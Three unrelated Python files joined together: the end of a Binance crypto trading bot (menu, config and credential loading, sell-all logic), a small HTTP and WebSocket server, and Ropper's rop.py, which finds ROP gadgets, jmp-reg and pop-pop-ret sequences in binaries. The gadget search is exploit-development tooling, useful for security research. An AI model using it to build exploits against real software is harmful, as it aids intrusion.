msg_discord(f'{str(datetime.now())} | SELL ALL COINS: {msgreason}')
# stop external signals so no buying/selling/pausing etc can occur
stop_signal_threads()
# sell all coins NOW!
sell_all_coins = True
coins_sold = sell_coins(session_tspl_ovr)
remove_from_portfolio(coins_sold)
# display final info to screen
#last_price = get_price()
last_price = wrap_get_price()
discordmsg = balance_report(last_price)
msg_discord(discordmsg)
sell_all_coins = False
def sell_a_specific_coin(coin):
global sell_specific_coin
msg_discord(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
# sell all coins NOW!
sell_specific_coin = True
coins_sold = sell_coins(False, coin)
remove_from_portfolio(coins_sold)
sell_specific_coin = False
def restart_signal_threads():
try:
for signalthread in signalthreads:
if any(signalthread.name in word for word in EXTSIGNAL_MODULES):
name = signalthread.name
print(f'Terminating thread {str(name)}')
signalthread.terminate()
time.sleep(2)
start_signal_thread(name)
except:
pass
def stop_signal_threads():
try:
for signalthread in signalthreads:
print(f'Terminating thread {str(signalthread.name)}')
signalthread.terminate()
except:
pass
def start_signal_threads():
signal_threads = []
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
#print(f"Starting external signal: {module}")
# add process to a list. This is so the thread can be terminated at a later time
signal_threads.append(start_signal_thread(module))
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
if str(e) == "object of type 'NoneType' has no len()":
print(f'No external signal modules running')
else:
print(f'start_signal_threads(): Loading external signals exception: {e}')
return signal_threads
def start_signal_thread(module):
try:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
# t = threading.Thread(target=mymodule[module].do_work, args=())
t = multiprocessing.Process(target=mymodule[module].do_work, args=())
t.name = module
t.daemon = True
t.start()
time.sleep(2)
return t
except Exception as e:
if str(e) == "object of type 'NoneType' has no len()":
print(f'No external signal modules running')
else:
print(f'start_signal_thread(): Loading external signals exception: {e}')
def truncate(number, decimals=0):
"""
Returns a value truncated to a specific number of decimal places.
Better than rounding
"""
if not isinstance(decimals, int):
raise TypeError("decimal places must be an integer.")
elif decimals < 0:
raise ValueError("decimal places has to be 0 or more.")
elif decimals == 0:
return math.trunc(number)
factor = 10.0 ** decimals
return math.trunc(number * factor) / factor
def wrap_get_price():
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
global tickers
if CUSTOM_LIST:
if CUSTOM_LIST_AUTORELOAD:
while True:
if not os.path.exists(TICKERS_LIST):
print(f"Autoreload tickers cannot find {TICKERS_LIST} file. Will retry in 1 second.")
time.sleep(1)
else:
break
prevcoincount = len(tickers)
# tickers=[line.strip() for line in open(TICKERS_LIST)]
# Reload coins, also adding those coins that we currently hold
#tickers=list(set([line.strip() for line in open(TICKERS_LIST)] + [coin['symbol'].removesuffix(PAIR_WITH) for coin in coins_bought.values()]))
tickers=list(set([line.strip() for line in open(TICKERS_LIST)] + [rchop(coin['symbol'], PAIR_WITH) for coin in coins_bought.values()]))
if DEBUG:
print(f"Reloaded tickers from {TICKERS_LIST} file. Prev coin count: {prevcoincount} | New coin count: {len(tickers)}")
return get_price()
if __name__ == '__main__':
#req_version = (3,9)
#if sys.version_info[:2] < req_version:
# print(f'This bot requires Python version 3.9 or higher/newer. You are running version {sys.version_info[:2]} - please upgrade your Python version!!')
# sys.exit()
# Load arguments then parse settings
args = parse_args()
mymodule = {}
discord_msg_balance_data = ""
last_msg_discord_balance_date = datetime.now()
last_history_log_date = datetime.now()
# set to false at Start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
# LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
HISTORY_LOG_FILE = "history.txt"
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
TRADE_TOTAL = parsed_config['trading_options']['TRADE_TOTAL']
TRADE_SLOTS = parsed_config['trading_options']['TRADE_SLOTS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
#COOLOFF_PERIOD = parsed_config['trading_options']['COOLOFF_PERIOD']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
CUSTOM_LIST_AUTORELOAD = parsed_config['trading_options']['CUSTOM_LIST_AUTORELOAD']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
# Code modified from DJCommie fork
# Load Session OVERRIDE values - used to STOP the bot when current session meets a certain STP or SSL value
SESSION_TPSL_OVERRIDE = parsed_config['trading_options']['SESSION_TPSL_OVERRIDE']
SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']
# Borrowed from DJCommie fork
# If TRUE, coin will only sell based on an external SELL signal
SELL_ON_SIGNAL_ONLY = parsed_config['trading_options']['SELL_ON_SIGNAL_ONLY']
# Discord integration
# Used to push alerts, messages etc to a discord channel
MSG_DISCORD = parsed_config['trading_options']['MSG_DISCORD']
# Whether the bot should reinvest your profits or not.
REINVEST_PROFITS = parsed_config['trading_options']['REINVEST_PROFITS']
# Functionality to "reset / restart" external signal modules
RESTART_EXTSIGNALS = parsed_config['trading_options']['RESTART_EXTSIGNALS']
EXTSIGNAL_MODULES = parsed_config['trading_options']['EXTSIGNAL_MODULES']
# Trashcan settings
#HODLMODE_ENABLED = parsed_config['trading_options']['HODLMODE_ENABLED']
#HODLMODE_TIME_THRESHOLD = parsed_config['trading_options']['HODLMODE_TIME_THRESHOLD']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'Loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
if MSG_DISCORD:
DISCORD_WEBHOOK = load_discord_creds(parsed_creds)
sell_all_coins = False
sell_specific_coin = False
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
# If the users has a bad / incorrect API key.
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
# path to the saved coins_bought file
coins_bought_file_path = file_prefix + 'coins_bought.json'
# The below mod was stolen and altered from GoGo's fork, a nice addition for keeping a historical history of profit across multiple bot sessions.
# path to the saved bot_stats file
bot_stats_file_path = file_prefix + 'bot_stats.json'
# use separate files for testing and live trading
LOG_FILE = file_prefix + LOG_FILE
HISTORY_LOG_FILE = file_prefix + HISTORY_LOG_FILE
bot_started_datetime = datetime.now()
total_capital_config = TRADE_SLOTS * TRADE_TOTAL
if os.path.isfile(bot_stats_file_path) and os.stat(bot_stats_file_path).st_size!= 0:
with open(bot_stats_file_path) as file:
bot_stats = json.load(file)
# load bot stats:
try:
bot_started_datetime = datetime.strptime(bot_stats['botstart_datetime'], '%Y-%m-%d %H:%M:%S.%f')
except Exception as e:
print (f'Exception on reading botstart_datetime from {bot_stats_file_path}. Exception: {e}')
bot_started_datetime = datetime.now()
try:
total_capital = bot_stats['total_capital']
except Exception as e:
print (f'Exception on reading total_capital from {bot_stats_file_path}. Exception: {e}')
total_capital = TRADE_SLOTS * TRADE_TOTAL
historic_profit_incfees_perc = bot_stats['historicProfitIncFees_Percent']
historic_profit_incfees_total = bot_stats['historicProfitIncFees_Total']
trade_wins = bot_stats['tradeWins']
trade_losses = bot_stats['tradeLosses']
try:
market_startprice = bot_stats['market_startprice']
except:
pass
if total_capital != total_capital_config:
historic_profit_incfees_perc = (historic_profit_incfees_total / total_capital_config) * 100
if REINVEST_PROFITS:
TRADE_TOTAL = total_capital / TRADE_SLOTS
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print(f'{txcolors.WARNING}Press Ctrl-C for more options / to stop the bot{txcolors.DEFAULT}')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: Test mode is disabled in the configuration, you are using _LIVE_ funds.')
print('WARNING: Waiting 10 seconds before live trading as a security measure!')
time.sleep(10)
remove_external_signals('buy')
remove_external_signals('sell')
remove_external_signals('pause')
# load signalling modules
signalthreads = start_signal_threads()
# seed initial prices
#get_price()
wrap_get_price()
TIMEOUT_COUNT=0
READ_CONNECTERR_COUNT=0
BINANCE_API_EXCEPTION=0
thehour = datetime.now().hour
while is_bot_running:
try:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
if SESSION_TPSL_OVERRIDE:
check_total_session_profit(coins_bought, last_price)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
update_bot_stats()
if RESTART_EXTSIGNALS and thehour != datetime.now().hour :
restart_signal_threads()
thehour = datetime.now().hour
except ReadTimeout as rt:
TIMEOUT_COUNT += 1
print(f'We got a timeout error from Binance. Re-loop. Connection Timeouts so far: {TIMEOUT_COUNT}')
except ConnectionError as ce:
READ_CONNECTERR_COUNT += 1
print(f'We got a connection error from Binance. Re-loop. Connection Errors so far: {READ_CONNECTERR_COUNT}')
except BinanceAPIException as bapie:
BINANCE_API_EXCEPTION += 1
print(f'We got an API error from Binance. Re-loop. API Errors so far: {BINANCE_API_EXCEPTION}.\nException:\n{bapie}')
except KeyboardInterrupt as ki:
# stop external signal threads
stop_signal_threads()
while True:
#print_notimestamp(f'{txcolors.WARNING}\n--| Binance Bot Menu |--{txcolors.DEFAULT}')
print_notimestamp(f'\n[1] Exit (default option)')
print_notimestamp(f'\n[2] Sell All Coins')
print_notimestamp(f'\n[3] Sell A Specific Coin')
print_notimestamp(f'\n[4] Resume Bot')
print_notimestamp(f'\n{txcolors.WARNING}Please choose one of the above menu options ([1]. Exit):{txcolors.DEFAULT}')
menuoption = input()
if menuoption == "1" or menuoption == "":
print_notimestamp('\n')
sys.exit(0)
elif menuoption == "2":
print_notimestamp('\n')
sell_all('Sell All Coins menu option chosen!')
print_notimestamp('\n')
elif menuoption == "3":
while not menuoption.upper() == "N":
# setup table
my_table = PrettyTable()
my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change % (ex fees)", "Profit $", "Time Held"]
my_table.align["Symbol"] = "l"
my_table.align["Volume"] = "r"
my_table.align["Bought At"] = "r"
my_table.align["Now At"] = "r"
my_table.align["TP %"] = "r"
my_table.align["SL %"] = "r"
my_table.align["Change % (ex fees)"] = "r"
my_table.align["Profit $"] = "r"
my_table.align["Time Held"] = "l"
# get latest prices
last_price = wrap_get_price()
# display coins to sell
#print('\n')
for coin in coins_bought:
time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
change_perc = (float(last_price[coin]['price']) - float(coins_bought[coin]['bought_at']))/float(coins_bought[coin]['bought_at']) * 100
ProfitExFees = float(last_price[coin]['price']) - float(coins_bought[coin]['bought_at'])
my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{coin}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['volume']):.6f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['bought_at']):.6f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(last_price[coin]['price']):.6f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['take_profit']):.4f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['stop_loss']):.4f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{change_perc:.4f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at'])*change_perc)/100:.6f}{txcolors.DEFAULT}",
f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.sortby = 'Change % (ex fees)'
if len(my_table._rows) > 0:
print_notimestamp(my_table)
else:
break
# ask for coin to sell
print_notimestamp(f'{txcolors.WARNING}\nType in the Symbol you wish to sell, including pair (i.e. BTCUSDT) or type N to return to Menu (N)?{txcolors.DEFAULT}')
menuoption = input()
if menuoption == "":
break
sell_a_specific_coin(menuoption.upper())
elif menuoption == "4":
print_notimestamp(f'{txcolors.WARNING}\nResuming the bot...\n\n{txcolors.DEFAULT}')
start_signal_threads()
break
if not is_bot_running:
if SESSION_TPSL_OVERRIDE:
print(f'')
print(f'')
print(f'{txcolors.WARNING}{session_tpsl_override_msg}{txcolors.DEFAULT}')
sell_all(session_tpsl_override_msg, True)
sys.exit(0)
else:
print(f'')
print(f'')
print(f'Bot terminated for some reason.') |
server.py | from os import chdir
from sys import stdout
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from threading import Thread
from websocket_server_api import WebsocketServer
from socket_server import new_client, message_received
lg = """
_ ____ _ _
(_) / __ \\ | (_)
_ ___ _ __| | | |_ __ | |_ _ __ ___
| |/ _ \\| '__| | | | '_ \\| | | '_ \\ / _ \\
| | (_) | | | |__| | | | | | | | | | __/
| |\\___/|_| \\____/|_| |_|_|_|_| |_|\\___|
_/ |
|__/
By Dan Burrows
"""
def run_socket_server(SOC_HOST, SOC_PORT):
server = WebsocketServer(SOC_PORT, SOC_HOST)
server.set_fn_new_client(new_client)
server.set_fn_message_received(message_received)
try:
server.run_forever()
except AssertionError:
print("Ignoring Assertion Error")
if __name__ == "__main__":
print(lg)
HOST = '0.0.0.0'
PORT = 1234
SOC_PORT = 9001
stdout.write('- Initializing WebSocket Server Threads...\t')
wsoc_thread = Thread(target=run_socket_server, args=(HOST, SOC_PORT))
stdout.write('[DONE]\n')
class Server_With_Threading(ThreadingMixIn, HTTPServer):
pass
# Building server object...
stdout.write('- Initializing HTTP Server Threads...\t')
server = Server_With_Threading((HOST, PORT), SimpleHTTPRequestHandler)
stdout.write('[DONE]\n')
# Pointing to folder containing index.html...
stdout.write('- Locking In File System...\t')
chdir('files')
stdout.write('[DONE]\n')
# Verifying index.html to prevent plain file serving...
stdout.write('- Verifying \'index.html\'...\t')
try:
with open('index.html', 'r') as x:
pass
stdout.write('[DONE]\n')
except FileNotFoundError:
stdout.write('[FAILED]\tSERVER MIGHT BE RUNNING WITHOUT AN INTERFACE!\n')
stdout.write('- Running WebSocket Server...\t')
wsoc_thread.start()
stdout.write('[DONE]\n')
# Running the server...
print('[jor_online_web] Active On... ' + HOST + ':' + str(PORT))
print('[jor_online_sockets] Active On... ' + HOST + ':' + str(SOC_PORT))
try:
while True:
stdout.flush()
server.handle_request()
except KeyboardInterrupt:
print("\nKILLING SERVER...")
|
rop.py | # coding=utf-8
# Copyright 2018 Sascha Schirra
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" A ND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from ropper.common.utils import *
from ropper.common.error import *
from ropper.common.enum import Enum
from ropper.arch import x86
from multiprocessing import Process, Pool, Queue, cpu_count, current_process, JoinableQueue
from .gadget import Gadget, GadgetType
from binascii import hexlify, unhexlify
from struct import pack
import re
import struct
import sys
import capstone
# Optional keystone support
try:
import keystone
except:
pass
class Format(Enum):
_enum_ = 'RAW STRING HEX'
class Ropper(object):
def __init__(self, callback=None):
"""
callback function signature:
def callback(section, gadgets, progress)
"""
super(Ropper, self).__init__()
self.__callback = callback
self.__cs = None
def __getCs(self, arch):
if not self.__cs or self.__cs.arch != arch.arch or self.__cs.mode != arch.mode:
self.__cs = capstone.Cs(arch.arch, arch.mode)
return self.__cs
def assemble(self, code, arch=x86, format=Format.HEX):
if 'keystone' not in globals():
raise RopperError('Keystone is not installed! Please install Keystone. \nLook at http://keystone-engine.org')
ks = keystone.Ks(arch.ksarch[0], arch.ksarch[1])
try:
byte_list = ks.asm(code.encode('ascii'))[0]
except BaseException as e:
raise RopperError(e)
if not byte_list:
return "invalid"
to_return = byte_list
if format == Format.STRING:
to_return = '"'
for byte in byte_list:
to_return += '\\x%02x' % byte
to_return += '"'
elif format == Format.HEX:
to_return = ''
for byte in byte_list:
to_return += '%02x' % byte
elif format == Format.RAW:
to_return = ''
for byte in byte_list:
to_return += '%s' % chr(byte)
return to_return
def disassemble(self, opcode, arch=x86):
opcode, size= self._formatOpcodeString(opcode, regex=False)
cs = self.__getCs(arch)
to_return = ''
byte_count = 0
opcode_tmp = opcode
while byte_count < size:
old_byte_count = byte_count
for i in cs.disasm(opcode_tmp,0):
to_return += '%s %s\n' % (i.mnemonic , i.op_str)
byte_count += len(i.bytes)
if old_byte_count == byte_count or byte_count < len(opcode):
byte_count += 1
opcode_tmp = opcode[byte_count:]
to_return += '<invalid>\n'
return to_return
def searchJmpReg(self, binary, regs):
toReturn = []
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
for section in binary.executableSections:
gadgets = self._searchJmpReg(section, binary, regs)
toReturn.extend(gadgets)
return toReturn
def _searchJmpReg(self, section, binary, regs):
if binary.arch.arch != capstone.CS_ARCH_X86:
raise NotSupportedError(
'Wrong architecture, \'jmp <reg>\' only supported on x86/x86_64')
cs = self.__getCs(binary.arch)
toReturn = []
Register = Enum('Register', 'ax cx dx bx sp bp si di')
for reg in regs:
reg_tmp = reg.strip()[1:]
if not Register[reg_tmp]:
raise RopperError('Invalid register: "%s"' % reg)
insts = [toBytes(0xff , 0xe0 | Register[reg_tmp]), toBytes(0xff, 0xd0 | Register[reg_tmp]), toBytes(0x50 | Register[reg_tmp] , 0xc3)]
for inst in insts:
toReturn.extend(self._searchOpcode(section, binary, inst, len(inst),True))
return sorted(toReturn, key=lambda x: str(x))
def _formatOpcodeString(self, opcode, regex=True):
if len(opcode) % 2 > 0:
raise RopperError('The length of the opcode has to be a multiple of two')
opcode = opcode.encode('ascii')
size = int(len(opcode)/2)
for b in (b'5c',b'5d',b'5b',b'28',b'29',b'2b',b'2a',b'2e',b'3f'):
if opcode.find(b) % 2 == 0:
opcode = opcode.replace(b,b'%s%s' % (hexlify(b'\\'),b))
m = re.search(b'\?', opcode)
while m:
if m.start() % 2 == 0:
char = opcode[m.start()+1]
if type(char) == int:
char = chr(char)
if char == '?':
opcode = opcode[:m.start()] + hexlify(b'[\x00-\xff]') + opcode[m.start()+2:]
else:
raise RopperError('A ? for the highest 4 bit of a byte is not supported (e.g. ?1, ?2, ..., ?a)')
elif m.start() % 2 == 1:
char = opcode[m.start()-1]
if type(char) == int:
char = chr(char)
high = int(char,16)
start = high << 4
end = start + 0xf
opcode = opcode[:m.start()-1] + hexlify(b'['+pack('B',start)+b'-'+pack('B',end)+b']') + opcode[m.start()+1:]
m = re.search(b'\?', opcode)
try:
opcode = unhexlify(opcode)
except BaseException as e:
#raise RopperError(e)
raise RopperError('Invalid characters in opcode string: %s' % opcode)
return opcode,size
def searchInstructions(self, binary, code):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
opcode = self.assemble(code, binary.arch)
return self.searchOpcode(binary, opcode, disass=True)
def searchOpcode(self, binary, opcode, disass=False):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
opcode, size = self._formatOpcodeString(opcode)
gadgets = []
for section in binary.executableSections:
gadgets.extend(self._searchOpcode(section, binary, opcode, size, disass))
return gadgets
def _searchOpcode(self, section, binary, opcode, size, disass=False):
disassembler = self.__getCs(binary.arch)
toReturn = []
code = bytearray(section.bytes)
offset = section.offset
for match in re.finditer(opcode, code):
opcodeGadget = Gadget(binary.checksum, section.name, binary.arch)
if (offset + match.start()) % binary.arch.align == 0:
if disass:
could_disass = False
#for i in disassembler.disasm(struct.pack('B' * size, *code[match.start():match.end()]), offset + match.start()):
for i in disassembler.disasm(struct.pack('B' * size, *code[match.start():match.end()]), offset + match.start()):
opcodeGadget.append(
i.address, i.mnemonic , i.op_str, bytes=i.bytes)
could_disass = True
if not could_disass:
continue
else:
opcodeGadget.append(
offset + match.start(), hexlify(match.group(0)).decode('utf-8'),bytes=match.group())
else:
continue
toReturn.append(opcodeGadget)
return toReturn
def searchPopPopRet(self, binary):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
toReturn = []
for section in binary.executableSections:
pprs = self._searchPopPopRet(section,binary)
toReturn.extend(pprs)
return toReturn
def _searchPopPopRet(self, section, binary):
if binary.arch != x86:
raise NotSupportedError(
'Wrong architecture, \'pop pop ret\' is only supported on x86')
disassembler = self.__getCs(binary.arch)
code = section.bytes
offset = section.offset
toReturn = []
pprs = binary.arch.pprs
for ppr in pprs:
for match in re.finditer(ppr, code):
if (offset + match.start()) % binary.arch.align == 0:
pprg = Gadget(binary.checksum,section.name, binary.arch)
for i in disassembler.disasm(bytes(bytearray(code)[match.start():match.end()]), offset + match.start()):
pprg.append(i.address, i.mnemonic , i.op_str, bytes=i.bytes)
toReturn.append(pprg)
return toReturn
def searchGadgets(self, binary, instructionCount=5, gtype=GadgetType.ALL):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
gadgets = []
for section in binary.executableSections:
vaddr = binary.imageBase
if self.__callback:
self.__callback(section, None, 0)
if sys.platform.startswith('win'):
newGadgets = self._searchGadgetsSingle(section=section, binary=binary, instruction_count=instructionCount, gtype=gtype)
else:
newGadgets = self._searchGadgetsForked(section=section, binary=binary, instruction_count=instructionCount, gtype=gtype)
gadgets.extend(newGadgets)
return sorted(gadgets, key=Gadget.simpleInstructionString)
def _searchGadgetsSingle(self, section, binary, instruction_count=5, gtype=GadgetType.ALL):
toReturn = []
code = bytes(bytearray(section.bytes))
offset = section.offset
arch = binary.arch
max_progress = len(code) * len(arch.endings[gtype])
vaddrs = set()
for ending in arch.endings[gtype]:
offset_tmp = 0
tmp_code = code[:]
match = re.search(ending[0], tmp_code)
while match:
offset_tmp += match.start()
index = match.start()
if offset_tmp % arch.align == 0:
#for x in range(arch.align, (depth + 1) * arch.align, arch.align): # This can be used if you want to use a bytecount instead of an instruction count per gadget
none_count = 0
for x in range(0, index+1, arch.align):
code_part = tmp_code[index - x:index + ending[1]]
gadget, leng = self.__createGadget(arch, code_part, offset + offset_tmp - x, ending,binary.checksum, section.name)
if gadget:
if leng > instruction_count:
break
if gadget:
if gadget.address not in vaddrs:
vaddrs.update([gadget.address])
toReturn.append(gadget)
none_count = 0
else:
none_count += 1
if none_count == arch.maxInvalid:
break
tmp_code = tmp_code[index+arch.align:]
offset_tmp += arch.align
match = re.search(ending[0], tmp_code)
if self.__callback:
progress = arch.endings[gtype].index(ending) * len(code) + len(code) - len(tmp_code)
self.__callback(section, toReturn, float(progress) / max_progress)
if self.__callback:
self.__callback(section, toReturn, 1.0)
return toReturn
def _searchGadgetsForked(self, section, binary, instruction_count=5, gtype=GadgetType.ALL):
to_return = []
code = bytes(bytearray(section.bytes))
processes = []
arch = binary.arch
max_progress = len(code) * len(arch.endings[gtype])
ending_queue = JoinableQueue()
gadget_queue = Queue()
tmp_code = code[:]
process_count = min(cpu_count()+1, len(arch.endings[gtype]))
for ending in arch.endings[gtype]:
ending_queue.put(ending)
for cpu in range(process_count):
ending_queue.put(None)
for cpu in range(process_count):
processes.append(Process(target=self.__gatherGadgetsByEndings, args=(tmp_code, arch, binary.checksum, section.name, section.offset, ending_queue, gadget_queue, instruction_count), name="GadgetSearch%d"%cpu))
processes[cpu].daemon=True
processes[cpu].start()
count = 0
ending_count = 0
if self.__callback:
self.__callback(section, to_return, 0)
while ending_count < len(arch.endings[gtype]):
gadgets = gadget_queue.get()
if gadgets != None:
to_return.extend(gadgets)
ending_count += 1
if self.__callback:
self.__callback(section, to_return, float(ending_count) / len(arch.endings[gtype]))
return to_return
def __gatherGadgetsByEndings(self,code, arch, fileName, sectionName, offset, ending_queue, gadget_queue, instruction_count):
#try:
while True:
ending = ending_queue.get()
if ending is None:
ending_queue.task_done()
break
gadgets = self.__gatherGadgetsByEnding(code, arch, fileName, sectionName, offset, ending, instruction_count)
gadget_queue.put(gadgets)
ending_queue.task_done()
#except BaseException as e:
# raise RopperError(e)
def __gatherGadgetsByEnding(self, code, arch, fileName, sectionName, offset, ending, instruction_count):
vaddrs = set()
offset_tmp = 0
tmp_code = code[:]
to_return = []
match = re.search(ending[0], tmp_code)
while match:
offset_tmp += match.start()
index = match.start()
if offset_tmp % arch.align == 0:
#for x in range(arch.align, (depth + 1) * arch.align, arch.align): # This can be used if you want to use a bytecount instead of an instruction count per gadget
none_count = 0
for x in range(0, index+1, arch.align):
code_part = tmp_code[index - x:index + ending[1]]
gadget, leng = self.__createGadget(arch, code_part, offset + offset_tmp - x , ending, fileName, sectionName)
if gadget:
if leng > instruction_count:
break
if gadget:
to_return.append(gadget)
none_count = 0
else:
none_count += 1
if none_count == arch.maxInvalid:
break
tmp_code = tmp_code[index+arch.align:]
offset_tmp += arch.align
match = re.search(ending[0], tmp_code)
return to_return
def __createGadget(self, arch, code_str, codeStartAddress, ending, binary=None, section=None):
gadget = Gadget(binary, section, arch)
hasret = False
disassembler = self.__getCs(arch)
for i in disassembler.disasm(code_str, codeStartAddress):
if re.match(ending[0], i.bytes):
hasret = True
if hasret or i.mnemonic not in arch.badInstructions:
gadget.append(
i.address, i.mnemonic,i.op_str, bytes=i.bytes)
if hasret or i.mnemonic in arch.badInstructions:
break
leng = len(gadget)
if hasret and leng > 0:
return gadget,leng
return None, -1
def __disassembleBackward(self, section, binary, vaddr,offset, count):
gadget = Gadget(binary.checksum, section.name, binary.arch)
counter = 0
toReturn = None
code = bytes(bytearray(section.bytes))
disassembler = self.__getCs(binary.arch)
while len(gadget) < count:
gadget = Gadget(binary.checksum, section.name, binary.arch)
for i in disassembler.disasm(struct.pack('B' * len(code[offset - counter:]), *bytearray(code[offset - counter:])), vaddr-counter):
gadget.append(i.address, i.mnemonic , i.op_str, i.bytes)
if i.address == vaddr:
toReturn = gadget
break
if i.address > vaddr:
if len(gadget) > count:
return toReturn
gadget = Gadget(binary.checksum, section.name, binary.arch)
break
counter += binary.arch.align
if offset - counter < 0:
return toReturn
if not toReturn:
toReturn = Gadget(binary.checksum, section.name, binary.arch)
toReturn.append(vaddr,'bad instructions')
return toReturn
